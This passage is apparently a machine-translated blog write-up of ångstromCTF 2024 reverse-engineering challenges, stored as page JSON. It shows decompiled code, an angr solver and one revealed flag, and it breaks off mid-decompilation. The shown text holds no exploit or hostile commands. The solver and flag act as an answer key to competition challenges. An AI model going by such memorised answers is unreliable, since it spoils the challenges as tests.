{"componentChunkName":"component---src-templates-post-template-js","path":"/ctf-angstrom-ctf-2024-en","result":{"data":{"markdownRemark":{"id":"c2f3bcaf-8939-5308-a004-30f543262f41","html":"<blockquote>\n<p>This page has been machine-translated from the <a href=\"/ctf-angstrom-ctf-2024\">original page</a>.</p>\n</blockquote>\n<p>I participated in ångstromCTF 2024 with the team 0nePadding.</p>\n<p>We finished at a clean 1000 points, placing 108th out of 923 teams.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 661px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/876f65ffad7a70fde9c3dcd513b236cf/0012b/image-20240602170849307.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 37.916666666666664%; position: relative; bottom: 0; left: 0; background-image: none; background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/876f65ffad7a70fde9c3dcd513b236cf/8ac56/image-20240602170849307.webp 240w,\n/static/876f65ffad7a70fde9c3dcd513b236cf/d3be9/image-20240602170849307.webp 480w,\n/static/876f65ffad7a70fde9c3dcd513b236cf/84ccf/image-20240602170849307.webp 661w\"\n              sizes=\"(max-width: 661px) 100vw, 661px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/876f65ffad7a70fde9c3dcd513b236cf/8ff5a/image-20240602170849307.png 240w,\n/static/876f65ffad7a70fde9c3dcd513b236cf/e85cb/image-20240602170849307.png 480w,\n/static/876f65ffad7a70fde9c3dcd513b236cf/0012b/image-20240602170849307.png 661w\"\n            sizes=\"(max-width: 661px) 100vw, 661px\"\n            type=\"image/png\"\n          />\n          <img\n            
class=\"gatsby-resp-image-image\"\n            src=\"/static/876f65ffad7a70fde9c3dcd513b236cf/0012b/image-20240602170849307.png\"\n            alt=\"image-20240602170849307\"\n            title=\"image-20240602170849307\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>Up until now I had focused almost entirely on Rev challenges, but going forward I plan to gradually tackle Pwn and Web as well.</p>\n<!-- omit in toc -->\n<h2 id=\"table-of-contents\" style=\"position:relative;\"><a href=\"#table-of-contents\" aria-label=\"table of contents permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Table of Contents</h2>\n<ul>\n<li><a href=\"#guess-the-flagrev\">Guess the Flag(Rev)</a></li>\n<li><a href=\"#switcherrev\">switcher(Rev)</a></li>\n<li><a href=\"#polyominorev\">Polyomino(Rev)</a></li>\n<li><a href=\"#exampwn\">exam(Pwn)</a></li>\n<li><a href=\"#presidentialpwn\">presidential(Pwn)</a></li>\n<li><a href=\"#spinnerweb\">spinner(Web)</a></li>\n<li><a href=\"#markdownweb\">markdown(Web)</a></li>\n<li><a href=\"#summary\">Summary</a></li>\n</ul>\n<h2 id=\"guess-the-flagrev\" style=\"position:relative;\"><a href=\"#guess-the-flagrev\" aria-label=\"guess the flagrev permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 
9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Guess the Flag(Rev)</h2>\n<blockquote>\n<p>Do you have what it takes to guess the flag?</p>\n</blockquote>\n<p>Decompiling the challenge binary yields the following result.</p>\n<div class=\"gatsby-highlight\" data-language=\"c\"><pre class=\"language-c\"><code class=\"language-c\"><span class=\"token class-name\">int32_t</span> <span class=\"token function\">main</span><span class=\"token punctuation\">(</span><span class=\"token class-name\">int32_t</span> argc<span class=\"token punctuation\">,</span> <span class=\"token keyword\">char</span><span class=\"token operator\">*</span><span class=\"token operator\">*</span> argv<span class=\"token punctuation\">,</span> <span class=\"token keyword\">char</span><span class=\"token operator\">*</span><span class=\"token operator\">*</span> envp<span class=\"token punctuation\">)</span>\n<span class=\"token punctuation\">{</span>\n    <span class=\"token keyword\">void</span><span class=\"token operator\">*</span> fsbase<span class=\"token punctuation\">;</span>\n    <span class=\"token class-name\">int64_t</span> rax <span class=\"token operator\">=</span> <span class=\"token operator\">*</span><span class=\"token punctuation\">(</span><span class=\"token class-name\">uint64_t</span><span class=\"token operator\">*</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token keyword\">char</span><span class=\"token operator\">*</span><span class=\"token punctuation\">)</span>fsbase <span class=\"token operator\">+</span> <span class=\"token number\">0x28</span><span class=\"token 
punctuation\">)</span><span class=\"token punctuation\">;</span>\n    <span class=\"token function\">puts</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"Go ahead, guess the flag: \"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n    <span class=\"token keyword\">void</span> buf<span class=\"token punctuation\">;</span>\n    <span class=\"token keyword\">void</span><span class=\"token operator\">*</span> rbx <span class=\"token operator\">=</span> <span class=\"token operator\">&amp;</span>buf<span class=\"token punctuation\">;</span>\n    <span class=\"token function\">fgets</span><span class=\"token punctuation\">(</span><span class=\"token operator\">&amp;</span>buf<span class=\"token punctuation\">,</span> <span class=\"token number\">0x3f</span><span class=\"token punctuation\">,</span> __TMC_END__<span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n    <span class=\"token keyword\">while</span> <span class=\"token punctuation\">(</span>true<span class=\"token punctuation\">)</span>\n    <span class=\"token punctuation\">{</span>\n        <span class=\"token keyword\">if</span> <span class=\"token punctuation\">(</span><span class=\"token function\">strlen</span><span class=\"token punctuation\">(</span><span class=\"token operator\">&amp;</span>buf<span class=\"token punctuation\">)</span> <span class=\"token operator\">&lt;=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token keyword\">char</span><span class=\"token operator\">*</span><span class=\"token punctuation\">)</span>rbx <span class=\"token operator\">-</span> <span class=\"token operator\">&amp;</span>buf<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span>\n        <span class=\"token punctuation\">{</span>\n            <span class=\"token keyword\">break</span><span class=\"token 
punctuation\">;</span>\n        <span class=\"token punctuation\">}</span>\n        <span class=\"token operator\">*</span><span class=\"token punctuation\">(</span><span class=\"token class-name\">uint8_t</span><span class=\"token operator\">*</span><span class=\"token punctuation\">)</span>rbx <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token operator\">*</span><span class=\"token punctuation\">(</span><span class=\"token class-name\">uint8_t</span><span class=\"token operator\">*</span><span class=\"token punctuation\">)</span>rbx <span class=\"token operator\">^</span> <span class=\"token number\">1</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n        rbx <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token keyword\">char</span><span class=\"token operator\">*</span><span class=\"token punctuation\">)</span>rbx <span class=\"token operator\">+</span> <span class=\"token number\">1</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n    <span class=\"token punctuation\">}</span>\n    <span class=\"token keyword\">if</span> <span class=\"token punctuation\">(</span><span class=\"token function\">strcmp</span><span class=\"token punctuation\">(</span><span class=\"token operator\">&amp;</span>buf<span class=\"token punctuation\">,</span> <span class=\"token string\">\"`bugzbnllhuude^un^uid^md`ru^rhfo…\"</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">!=</span> <span class=\"token number\">0</span><span class=\"token punctuation\">)</span>\n    <span class=\"token punctuation\">{</span>\n        <span class=\"token function\">puts</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"Wrong. 
Not sure why you'd think …\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n    <span class=\"token punctuation\">}</span>\n    <span class=\"token keyword\">else</span>\n    <span class=\"token punctuation\">{</span>\n        <span class=\"token function\">puts</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"Correct! It was kinda obvious tb…\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n    <span class=\"token punctuation\">}</span>\n    <span class=\"token operator\">*</span><span class=\"token punctuation\">(</span><span class=\"token class-name\">uint64_t</span><span class=\"token operator\">*</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token keyword\">char</span><span class=\"token operator\">*</span><span class=\"token punctuation\">)</span>fsbase <span class=\"token operator\">+</span> <span class=\"token number\">0x28</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n    <span class=\"token keyword\">if</span> <span class=\"token punctuation\">(</span>rax <span class=\"token operator\">!=</span> <span class=\"token operator\">*</span><span class=\"token punctuation\">(</span><span class=\"token class-name\">uint64_t</span><span class=\"token operator\">*</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token keyword\">char</span><span class=\"token operator\">*</span><span class=\"token punctuation\">)</span>fsbase <span class=\"token operator\">+</span> <span class=\"token number\">0x28</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span>\n    <span class=\"token punctuation\">{</span>\n        <span class=\"token function\">__stack_chk_fail</span><span 
class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n        <span class=\"token comment\">/* no return */</span>\n    <span class=\"token punctuation\">}</span>\n    <span class=\"token keyword\">return</span> <span class=\"token number\">0</span><span class=\"token punctuation\">;</span>\n<span class=\"token punctuation\">}</span></code></pre></div>\n<p>The program XORs each byte of the input with 1 and compares the result against an embedded string, so it is clear at a glance that the flag is stored in the binary XORed with 1.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 710px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/cc355bd918477f6620e6533371e4fd7a/7131f/image-20240525184353437.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 37.916666666666664%; position: relative; bottom: 0; left: 0; background-image: none; background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/cc355bd918477f6620e6533371e4fd7a/8ac56/image-20240525184353437.webp 240w,\n/static/cc355bd918477f6620e6533371e4fd7a/d3be9/image-20240525184353437.webp 480w,\n/static/cc355bd918477f6620e6533371e4fd7a/457aa/image-20240525184353437.webp 710w\"\n              sizes=\"(max-width: 710px) 100vw, 710px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/cc355bd918477f6620e6533371e4fd7a/8ff5a/image-20240525184353437.png 240w,\n/static/cc355bd918477f6620e6533371e4fd7a/e85cb/image-20240525184353437.png 480w,\n/static/cc355bd918477f6620e6533371e4fd7a/7131f/image-20240525184353437.png 710w\"\n            sizes=\"(max-width: 710px) 100vw, 710px\"\n            type=\"image/png\"\n          />\n       
   <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/cc355bd918477f6620e6533371e4fd7a/7131f/image-20240525184353437.png\"\n            alt=\"image-20240525184353437\"\n            title=\"image-20240525184353437\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<h2 id=\"switcherrev\" style=\"position:relative;\"><a href=\"#switcherrev\" aria-label=\"switcherrev permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>switcher(Rev)</h2>\n<blockquote>\n<p>It’s incredible how completely indiscernible the functions are…</p>\n</blockquote>\n<p>Looking at the challenge binary, we can see it validates a password string obtained via <code class=\"language-text\">fgets</code>.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 517px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/0adaa58c9901d2a110c7664cb79cea09/fa2f5/image-20240526132723701.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 43.333333333333336%; position: relative; bottom: 0; left: 0; background-image: 
none; background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/0adaa58c9901d2a110c7664cb79cea09/8ac56/image-20240526132723701.webp 240w,\n/static/0adaa58c9901d2a110c7664cb79cea09/d3be9/image-20240526132723701.webp 480w,\n/static/0adaa58c9901d2a110c7664cb79cea09/7f59e/image-20240526132723701.webp 517w\"\n              sizes=\"(max-width: 517px) 100vw, 517px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/0adaa58c9901d2a110c7664cb79cea09/8ff5a/image-20240526132723701.png 240w,\n/static/0adaa58c9901d2a110c7664cb79cea09/e85cb/image-20240526132723701.png 480w,\n/static/0adaa58c9901d2a110c7664cb79cea09/fa2f5/image-20240526132723701.png 517w\"\n            sizes=\"(max-width: 517px) 100vw, 517px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/0adaa58c9901d2a110c7664cb79cea09/fa2f5/image-20240526132723701.png\"\n            alt=\"image-20240526132723701\"\n            title=\"image-20240526132723701\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    
</span></p>\n<p>Examining the function that performs this check reveals that it calls a series of functions, each comparing the flag one character at a time from the beginning.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 865px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/916c02254c27cd72a91a2e838b879ece/79e48/image-20240526132742407.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 50%; position: relative; bottom: 0; left: 0; background-image: none; background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/916c02254c27cd72a91a2e838b879ece/8ac56/image-20240526132742407.webp 240w,\n/static/916c02254c27cd72a91a2e838b879ece/d3be9/image-20240526132742407.webp 480w,\n/static/916c02254c27cd72a91a2e838b879ece/5d624/image-20240526132742407.webp 865w\"\n              sizes=\"(max-width: 865px) 100vw, 865px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/916c02254c27cd72a91a2e838b879ece/8ff5a/image-20240526132742407.png 
240w,\n/static/916c02254c27cd72a91a2e838b879ece/e85cb/image-20240526132742407.png 480w,\n/static/916c02254c27cd72a91a2e838b879ece/79e48/image-20240526132742407.png 865w\"\n            sizes=\"(max-width: 865px) 100vw, 865px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/916c02254c27cd72a91a2e838b879ece/79e48/image-20240526132742407.png\"\n            alt=\"image-20240526132742407\"\n            title=\"image-20240526132742407\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>This kind of challenge is trivially solved with angr, so I retrieved the flag using the following solver.</p>\n<div class=\"gatsby-highlight\" data-language=\"python\"><pre class=\"language-python\"><code class=\"language-python\"><span class=\"token keyword\">import</span> angr\n\nproj <span class=\"token operator\">=</span> angr<span class=\"token punctuation\">.</span>Project<span class=\"token punctuation\">(</span><span class=\"token string\">\"switcher\"</span><span class=\"token punctuation\">,</span> auto_load_libs<span class=\"token operator\">=</span><span class=\"token boolean\">False</span><span class=\"token punctuation\">)</span>\nobj <span class=\"token operator\">=</span> proj<span class=\"token punctuation\">.</span>loader<span class=\"token punctuation\">.</span>main_object\nfind <span class=\"token operator\">=</span> <span class=\"token number\">0x401219</span>\navoids <span class=\"token operator\">=</span> <span class=\"token punctuation\">[</span><span class=\"token number\">0x40122c</span><span class=\"token punctuation\">,</span><span class=\"token number\">0x4010f8</span><span class=\"token punctuation\">]</span>\ninit_state <span class=\"token operator\">=</span> proj<span class=\"token punctuation\">.</span>factory<span 
class=\"token punctuation\">.</span>entry_state<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\nsimgr <span class=\"token operator\">=</span> proj<span class=\"token punctuation\">.</span>factory<span class=\"token punctuation\">.</span>simgr<span class=\"token punctuation\">(</span>init_state<span class=\"token punctuation\">)</span>\nsimgr<span class=\"token punctuation\">.</span>explore<span class=\"token punctuation\">(</span>find<span class=\"token operator\">=</span>find<span class=\"token punctuation\">,</span> avoid<span class=\"token operator\">=</span>avoids<span class=\"token punctuation\">)</span>\n<span class=\"token keyword\">print</span><span class=\"token punctuation\">(</span>simgr<span class=\"token punctuation\">.</span>found<span class=\"token punctuation\">[</span><span class=\"token number\">0</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">.</span>posix<span class=\"token punctuation\">.</span>dumps<span class=\"token punctuation\">(</span><span class=\"token number\">0</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span>\n\n<span class=\"token comment\"># actf{jumping_my_way_to_the_flag_one_by_one}</span></code></pre></div>\n<h2 id=\"polyominorev\" style=\"position:relative;\"><a href=\"#polyominorev\" aria-label=\"polyominorev permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Polyomino(Rev)</h2>\n<blockquote>\n<p>I know this is a cybersecurity competition but I decided to throw in a math problem to level the field a little bit. 
You can solve it, right?</p>\n</blockquote>\n<p>Analyzing the challenge binary yields the following decompilation result.</p>\n<div class=\"gatsby-highlight\" data-language=\"c\"><pre class=\"language-c\"><code class=\"language-c\"><span class=\"token class-name\">int32_t</span> <span class=\"token function\">main</span><span class=\"token punctuation\">(</span><span class=\"token class-name\">int32_t</span> argc<span class=\"token punctuation\">,</span> <span class=\"token keyword\">char</span><span class=\"token operator\">*</span><span class=\"token operator\">*</span> argv<span class=\"token punctuation\">,</span> <span class=\"token keyword\">char</span><span class=\"token operator\">*</span><span class=\"token operator\">*</span> envp<span class=\"token punctuation\">)</span>\n<span class=\"token punctuation\">{</span>\n    <span class=\"token keyword\">void</span><span class=\"token operator\">*</span> fsbase\n    <span class=\"token class-name\">int64_t</span> rax <span class=\"token operator\">=</span> <span class=\"token operator\">*</span><span class=\"token punctuation\">(</span>fsbase <span class=\"token operator\">+</span> <span class=\"token number\">0x28</span><span class=\"token punctuation\">)</span>\n    <span class=\"token function\">__printf_chk</span><span class=\"token punctuation\">(</span>flag<span class=\"token operator\">:</span> <span class=\"token number\">1</span><span class=\"token punctuation\">,</span> format<span class=\"token operator\">:</span> <span class=\"token string\">\"I'm practicing my math skills. 
G…\"</span><span class=\"token punctuation\">)</span>\n    <span class=\"token class-name\">int32_t</span><span class=\"token operator\">*</span> var_80 <span class=\"token operator\">=</span> <span class=\"token operator\">&amp;</span>data_40a0\n    <span class=\"token class-name\">int32_t</span><span class=\"token operator\">*</span> var_88 <span class=\"token operator\">=</span> <span class=\"token operator\">&amp;</span>data_409c\n    <span class=\"token class-name\">int32_t</span><span class=\"token operator\">*</span> var_90 <span class=\"token operator\">=</span> <span class=\"token operator\">&amp;</span>data_4098\n    <span class=\"token class-name\">int32_t</span><span class=\"token operator\">*</span> var_98 <span class=\"token operator\">=</span> <span class=\"token operator\">&amp;</span>data_4094\n    <span class=\"token function\">__isoc99_scanf</span><span class=\"token punctuation\">(</span>format<span class=\"token operator\">:</span> <span class=\"token string\">\"%d %d %d %d %d %d %d %d %d\"</span><span class=\"token punctuation\">,</span> <span class=\"token operator\">&amp;</span>data_4080<span class=\"token punctuation\">,</span> <span class=\"token operator\">&amp;</span>data_4080<span class=\"token operator\">:</span><span class=\"token number\">4</span><span class=\"token punctuation\">,</span> <span class=\"token operator\">&amp;</span>data_4088<span class=\"token punctuation\">,</span> <span class=\"token operator\">&amp;</span>data_4088<span class=\"token operator\">:</span><span class=\"token number\">4</span><span class=\"token punctuation\">,</span> <span class=\"token operator\">&amp;</span>data_4090<span class=\"token punctuation\">,</span> var_98<span class=\"token punctuation\">,</span> var_90<span class=\"token punctuation\">,</span> var_88<span class=\"token punctuation\">,</span> var_80<span class=\"token punctuation\">)</span>\n    <span class=\"token function\">__printf_chk</span><span class=\"token 
punctuation\">(</span>flag<span class=\"token operator\">:</span> <span class=\"token number\">1</span><span class=\"token punctuation\">,</span> format<span class=\"token operator\">:</span> <span class=\"token string\">\"Hmm, let me think\"</span><span class=\"token punctuation\">)</span>\n    <span class=\"token function\">fflush</span><span class=\"token punctuation\">(</span>fp<span class=\"token operator\">:</span> <span class=\"token constant\">stdout</span><span class=\"token punctuation\">)</span>\n    <span class=\"token function\">usleep</span><span class=\"token punctuation\">(</span>useconds<span class=\"token operator\">:</span> <span class=\"token number\">0x493e0</span><span class=\"token punctuation\">)</span>\n    <span class=\"token function\">putchar</span><span class=\"token punctuation\">(</span>c<span class=\"token operator\">:</span> <span class=\"token number\">0x2e</span><span class=\"token punctuation\">)</span>\n    <span class=\"token function\">fflush</span><span class=\"token punctuation\">(</span>fp<span class=\"token operator\">:</span> <span class=\"token constant\">stdout</span><span class=\"token punctuation\">)</span>\n    <span class=\"token function\">usleep</span><span class=\"token punctuation\">(</span>useconds<span class=\"token operator\">:</span> <span class=\"token number\">0x493e0</span><span class=\"token punctuation\">)</span>\n    <span class=\"token function\">putchar</span><span class=\"token punctuation\">(</span>c<span class=\"token operator\">:</span> <span class=\"token number\">0x2e</span><span class=\"token punctuation\">)</span>\n    <span class=\"token function\">fflush</span><span class=\"token punctuation\">(</span>fp<span class=\"token operator\">:</span> <span class=\"token constant\">stdout</span><span class=\"token punctuation\">)</span>\n    <span class=\"token function\">usleep</span><span class=\"token punctuation\">(</span>useconds<span class=\"token operator\">:</span> <span class=\"token 
number\">0x493e0</span><span class=\"token punctuation\">)</span>\n    <span class=\"token function\">puts</span><span class=\"token punctuation\">(</span>str<span class=\"token operator\">:</span> <span class=\"token operator\">&amp;</span>data_2098<span class=\"token punctuation\">)</span>\n    <span class=\"token function\">usleep</span><span class=\"token punctuation\">(</span>useconds<span class=\"token operator\">:</span> <span class=\"token number\">0x7a120</span><span class=\"token punctuation\">)</span>\n    <span class=\"token class-name\">int64_t</span> rdi_3 <span class=\"token operator\">=</span> <span class=\"token operator\">-</span><span class=\"token number\">0x3c</span>\n    <span class=\"token class-name\">int32_t</span> rax_15\n    <span class=\"token keyword\">while</span> <span class=\"token punctuation\">(</span>true<span class=\"token punctuation\">)</span>\n        <span class=\"token class-name\">int64_t</span><span class=\"token operator\">*</span> i_1 <span class=\"token operator\">=</span> <span class=\"token operator\">&amp;</span>data_4080\n        <span class=\"token class-name\">int64_t</span> rsi <span class=\"token operator\">=</span> <span class=\"token number\">0</span>\n        <span class=\"token class-name\">int64_t</span> rcx_1 <span class=\"token operator\">=</span> <span class=\"token number\">1</span>\n        <span class=\"token class-name\">int64_t</span><span class=\"token operator\">*</span> i <span class=\"token operator\">=</span> <span class=\"token operator\">&amp;</span>data_4080\n        <span class=\"token class-name\">uint64_t</span> rdx_1\n        <span class=\"token keyword\">do</span>\n            <span class=\"token class-name\">int64_t</span> rdx <span class=\"token operator\">=</span> sx<span class=\"token punctuation\">.</span><span class=\"token function\">q</span><span class=\"token punctuation\">(</span><span class=\"token operator\">*</span>i<span class=\"token punctuation\">)</span>\n            i 
<span class=\"token operator\">=</span> i <span class=\"token operator\">+</span> <span class=\"token number\">4</span>\n            rdx_1 <span class=\"token operator\">=</span> rdx <span class=\"token operator\">*</span> rcx_1\n            rcx_1 <span class=\"token operator\">=</span> rcx_1 <span class=\"token operator\">*</span> rdi_3\n            rsi <span class=\"token operator\">=</span> rsi <span class=\"token operator\">+</span> rdx_1\n        <span class=\"token keyword\">while</span> <span class=\"token punctuation\">(</span><span class=\"token operator\">&amp;</span>data_40a4 <span class=\"token operator\">!=</span> i<span class=\"token punctuation\">)</span>\n        <span class=\"token keyword\">if</span> <span class=\"token punctuation\">(</span>rdi_3<span class=\"token punctuation\">.</span>d <span class=\"token operator\">!=</span> <span class=\"token number\">0x2c</span> <span class=\"token operator\">&amp;&amp;</span> rdi_3<span class=\"token punctuation\">.</span>d <span class=\"token operator\">!=</span> <span class=\"token number\">0x3a</span><span class=\"token punctuation\">)</span>\n            <span class=\"token class-name\">uint64_t</span> r9_2 <span class=\"token operator\">=</span> zx<span class=\"token punctuation\">.</span><span class=\"token function\">q</span><span class=\"token punctuation\">(</span>rdi_3<span class=\"token punctuation\">.</span>d <span class=\"token operator\">+</span> <span class=\"token number\">0x25</span><span class=\"token punctuation\">)</span>\n            <span class=\"token keyword\">if</span> <span class=\"token punctuation\">(</span>r9_2<span class=\"token punctuation\">.</span>d u<span class=\"token operator\">></span> <span class=\"token number\">0x36</span> <span class=\"token operator\">||</span> <span class=\"token punctuation\">(</span>r9_2<span class=\"token punctuation\">.</span>d u<span class=\"token operator\">&lt;=</span> <span class=\"token number\">0x36</span> <span class=\"token 
operator\">&amp;&amp;</span> <span class=\"token function\">not</span><span class=\"token punctuation\">(</span><span class=\"token function\">test_bit</span><span class=\"token punctuation\">(</span><span class=\"token number\">0x400c0210000001</span><span class=\"token punctuation\">,</span> r9_2<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span>\n                <span class=\"token keyword\">if</span> <span class=\"token punctuation\">(</span>rsi<span class=\"token punctuation\">.</span>d <span class=\"token operator\">!=</span> <span class=\"token number\">0</span><span class=\"token punctuation\">)</span>\n                    <span class=\"token keyword\">goto</span> label_1285\n                <span class=\"token keyword\">goto</span> label_138f\n        <span class=\"token keyword\">if</span> <span class=\"token punctuation\">(</span>rsi<span class=\"token punctuation\">.</span>d <span class=\"token operator\">!=</span> <span class=\"token number\">0</span><span class=\"token punctuation\">)</span>\n            label_138f<span class=\"token operator\">:</span>\n            <span class=\"token function\">puts</span><span class=\"token punctuation\">(</span>str<span class=\"token operator\">:</span> <span class=\"token string\">\"Those aren't the right numbers. 
